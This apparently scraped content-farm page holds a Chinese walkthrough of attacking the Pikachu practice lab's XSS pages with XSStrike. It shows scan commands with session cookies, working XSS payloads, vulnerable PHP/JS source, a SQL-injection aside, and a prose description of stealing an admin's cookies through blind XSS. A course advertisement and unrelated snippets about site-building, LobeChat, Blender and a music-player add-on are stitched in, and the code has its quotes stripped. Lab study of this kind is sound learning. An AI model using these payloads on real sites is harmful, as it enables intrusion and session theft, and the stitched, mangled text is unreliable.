南京自助建站网站搜索网站排名优化

张小明 2026/1/2 22:41:04
南京自助建站网站,搜索网站排名优化,辽源建站公司,企业网站怎么优化本文使用靶机pikachu#xff0c;来练习一下工具XSStrike 常用命令 -u url–skip 跳过确认提示–skip-dom 跳过dom型扫描–data post型时的数据 反射型XSS(get) 输入kobe 正常 可以看到#xff0c;是get型#xff0c;页面返回正常 攻击 python xsstrike.py -u ht…本文使用靶机pikachu来练习一下工具XSStrike常用命令-u url–skip 跳过确认提示–skip-dom 跳过dom型扫描–data post型时的数据反射型XSS(get)输入kobe正常可以看到是get型页面返回正常攻击python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?messagekobesubmitsubmit --skip --skip-dom试一下第一个payload利用的是html的details标签detAiLs%0DoNtoGgle%0A%0Aconfirm()// http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message%3CdetAiLs%0doNtoGgle%0a%0aconfirm()//submitsubmit代码分析$html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ if($_GET[message]kobe){ $html.p classnotice愿你和{$_GET[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_GET[message]},i dont care!/p; } } } ?php echo $html;?主要步骤isset检测变量submit是否已设置并且非 NULL即判断用户是否点击了submit按钮。得到message参数判断是否非空。若为空输出提示。若非空且为kobe输出上面截图的图片及内容。否则拼接到html变量并输出html反射型XSS(post)登录后输入1打开Hackbar和F12的控制台分别获取POST数据和Cookie。获取POST数据和Cookie攻击注意Cookie:之后有一个空格。python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php --data message1submitsubmit --headers Cookie: ant[uname]admin; ant[pw]10470c3b4b1fed12c3baac014be15fac67c6e815; csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDslttj3hh1eig65tvj7ldppb984使用第2个吧d3v%09onmousEOVer%0d%0dconfirm()%0dxv3dm0sburpsuite拦截修改post数据代码分析if(!$is_login_id){ header(location:post_login.php); } $state 你已经登陆成功,a hrefxss_reflected_post.php?logout1退出登陆/a; $html; if(isset($_POST[submit])){ if(empty($_POST[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ //下面直接将前端输入的参数原封不动的输出了,出现xss if($_POST[message]kobe){ $html.p classnotice愿你和{$_POST[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_POST[message]},i dont care!/p; } } } if(isset($_GET[logout]) $_GET[logout] 1){ setcookie(ant[uname],); setcookie(ant[pw],); header(location:post_login.php); }主要步骤相同的不再赘述。和之前相比添加了登录用来设置Cookie不过仍然是进行拼接没有任何过滤。存储型XSS输入1点击提交返回正常。攻击注意由于保存到数据库及时按CtrlCpython xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_stored.php --data message1submitsubmit --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDslttj3hh1eig65tvj7ldppb984 --skip-dom --skipXSStrike结果pikachu页面结果数据库中message表部分内容代码分析$html; if(array_key_exists(message,$_POST) $_POST[message]!null){ $messageescape($link, $_POST[message]); $queryinsert into message(content,time) values($message,now()); $resultexecute($link, $query); if(mysqli_affected_rows($link)!1){ $html.p数据库出现异常提交失败/p; } } if(array_key_exists(id, $_GET) is_numeric($_GET[id])){ //彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入 $querydelete from message where id{$_GET[id]}; $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ echo script typetext/javascriptdocument.location.hrefxss_stored.php/script; }else{ $html.p idop_notice删除失败,请重试并检查数据库是否还好!/p; } } ?php echo $html; $queryselect * from message; $resultexecute($link, $query); while($datamysqli_fetch_assoc($result)){ echo p classcon{$data[content]}/pa hrefxss_stored.php?id{$data[id]}删除/a; } echo $html; ?主要步骤把message和时间存储到数据库直接从数据库中拿出来展示。输入未过滤输出未转码同时有个彩蛋删除时存在sql注入漏洞需要绕过is_numeric的过滤。DOM型XSS出现what do you see链接点击what do you see链接后跳转到1说明a链接中包含输入且url上也存在输入。攻击先试试和之前的文件上传漏洞合作一把。../unsafeupload/uploads/tupian.php点击what do you see?即可跳转。接下来就看xssF12查看链接what do you see?XSStrikepython xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_dom.php --data message1submitsubmit --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDtoqllihbqq4jmiudeq49dfttt1 --skip失败手工闭合一下由于点击可能跳转使用的onmouseover事件。’ onmouseover “alert(‘lady_killer9’)”成功代码分析div idxssd_main script function domxss(){ var str document.getElementById(text).value; document.getElementById(dom).innerHTML a hrefstrwhat do you see?/a; } //试试img src# onmouseoveralert(xss) //试试 onclickalert(xss),闭合掉就行 /script !--a href onclick(xss)-- input idtext nametext typetext value / input idbutton typebutton valueclick me! onclickdomxss() / div iddom/div /div主要步骤使用innerHTML在id为dom的 div块中添加a链接输入的转为字符串放到a链接的href属性上。DOM型XSS-X输入伤心的往事上道题使用XSStrike没做出来出现了一个链接是get型传参。点击a链接又出现了一个可以看到我们的输入和上道题就一样了我估计XSStrike还是做不出来我就直接手工了。手工注入button οnclick“alert(/xss/)”成功哈哈哈那个按钮太小了差点没看见。你可以使用标签配合onerror等事件。代码分析$html; if(isset($_GET[text])){ $html. a href# onclickdomxss()有些费尽心机想要忘记的事情,后来真的就忘掉了/a; } div idxssd_main script function domxss(){ var str window.location.search; var txss decodeURIComponent(str.split(text)[1]); var xss txss.replace(/\/g, ); // alert(xss); document.getElementById(dom).innerHTML a hrefxss就让往事都随风,都随风吧/a; } //试试img src# onmouseoveralert(xss) //试试 onclickalert(xss),闭合掉就行 /script !--a href onclick(xss)-- form methodget input idtext nametext typetext value / input idsubmit typesubmit value请说出你的伤心往事/ /form div iddom/div /div主要步骤提交表单后得到text添加一个a链接href属性为#点击运行domxss函数。domxss函数将text通过正则进行一个简单过滤然后和上一个一样。漏洞原因尝试过滤但是过滤太简单。通过点击之后再显示输出可以解决大部分自动化注入脚本可以自己写脚本添加锚点即可。XSS之盲打输入帅呆了lady_killer9点击提交正常攻击python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xssblind/xss_blind.php --data content帅呆了namelady_killersubmit提交 --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDtoqllihbqq4jmiudeq49dfttt1 --skip失败点一下提示提示原来需要登录登录后管理员能够看到结果。我们可以通过xss注入使用js发送邮件或使用websocket将管理员的cookie等发送到我们的服务器在Cookie失效前使用获得管理员权限。留言和用户名输入登录管理员账号查看攻击成功代码分析if(array_key_exists(content,$_POST) $_POST[content]!null){ $contentescape($link, $_POST[content]); $nameescape($link, $_POST[name]); $time$timedate(Y-m-d g:i:s); $queryinsert into xssblind(time,content,name) values($time,$content,$name); $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ $html.p谢谢参与阁下的看法我们已经收到!/p; }else { $html.pooo.提交出现异常请重新提交/p; } } ?php $queryselect * from xssblind; $resultmysqli_query($link, $query); while($datamysqli_fetch_assoc($result)){ $htmlA tr td{$data[id]}/td td{$data[time]}/td td{$data[content]}/td td{$data[name]}/td tda hrefadmin.php?id{$data[id]}删除/a/td /tr A; echo $html; } ?主要步骤提交后直接保存到数据库。显示时直接从数据库读取出来拼接后显示。漏洞原因未对输入进行过滤输出时直接拼接。个人认为这个成功的概率太低真的是盲打sql盲注时虽然没有具体的回显但是好歹还知道sql语句是否运行成功可以通过bool或时间判断。这个直接在管理员界面你不清楚注入点也不清楚是否需要闭合。XSS之过滤输入我用Python学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

旅游电子商务网站建设试题社交网站备案

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 创建一个企业级Windows清理工具,要求:1.支持AD域账户认证2.可配置的清理策略(按部门/用户组设置不同规则)3.定时自动执行功能4.生成P…

张小明 2025/12/31 20:06:48 网站建设

网上有免费的网站吗如何注册api key域名

LobeChat 使用时长统计的技术实现与工程实践 在企业级 AI 应用日益普及的今天,一个看似简单的“聊天助手”背后,往往隐藏着复杂的运营分析需求。比如:某个部门部署的 AI 客服到底被用了多少次?用户平均一次聊多久?哪些…

张小明 2025/12/29 4:01:07 网站建设

网站建设北京海淀网站内容由什么组成部分组成部分

3步轻松搞定BetterNCM安装:网易云音乐终极增强指南 【免费下载链接】BetterNCM-Installer 一键安装 Better 系软件 项目地址: https://gitcode.com/gh_mirrors/be/BetterNCM-Installer 想要让你的网易云音乐播放器拥有更多实用功能吗?BetterNCM安…

张小明 2025/12/29 4:01:09 网站建设

英文网站seo推广咸宁网站seo

Blender性能优化终极指南:彻底告别卡顿,享受极致流畅体验 【免费下载链接】blender Official mirror of Blender 项目地址: https://gitcode.com/gh_mirrors/bl/blender 想要在Blender中实现丝滑般的操作体验吗?无论你是建模新手还是资…

张小明 2026/1/2 5:02:05 网站建设

传统网站和手机网站的区别是什么意思电商网站建设课设

Linux 内核中的定时器与时间管理:第一部分 1. 引言 定时器和时间管理在 Linux 内核中扮演着至关重要的角色,被广泛应用于各种任务。例如,TCP 实现中的不同超时设置、内核获取当前时间、调度异步函数以及安排下一个事件中断等。本文将从 Linux 内核的早期部分开始,深入探讨…

张小明 2025/12/29 4:01:11 网站建设

网站建设所用的工具wordpress 插件激活

付费内容解锁:5种实用方法让你轻松获取完整文章 【免费下载链接】bypass-paywalls-chrome-clean 项目地址: https://gitcode.com/GitHub_Trending/by/bypass-paywalls-chrome-clean 你是否曾经点击一篇看似精彩的文章,却被付费墙无情地挡在外面&…

张小明 2026/1/1 7:48:17 网站建设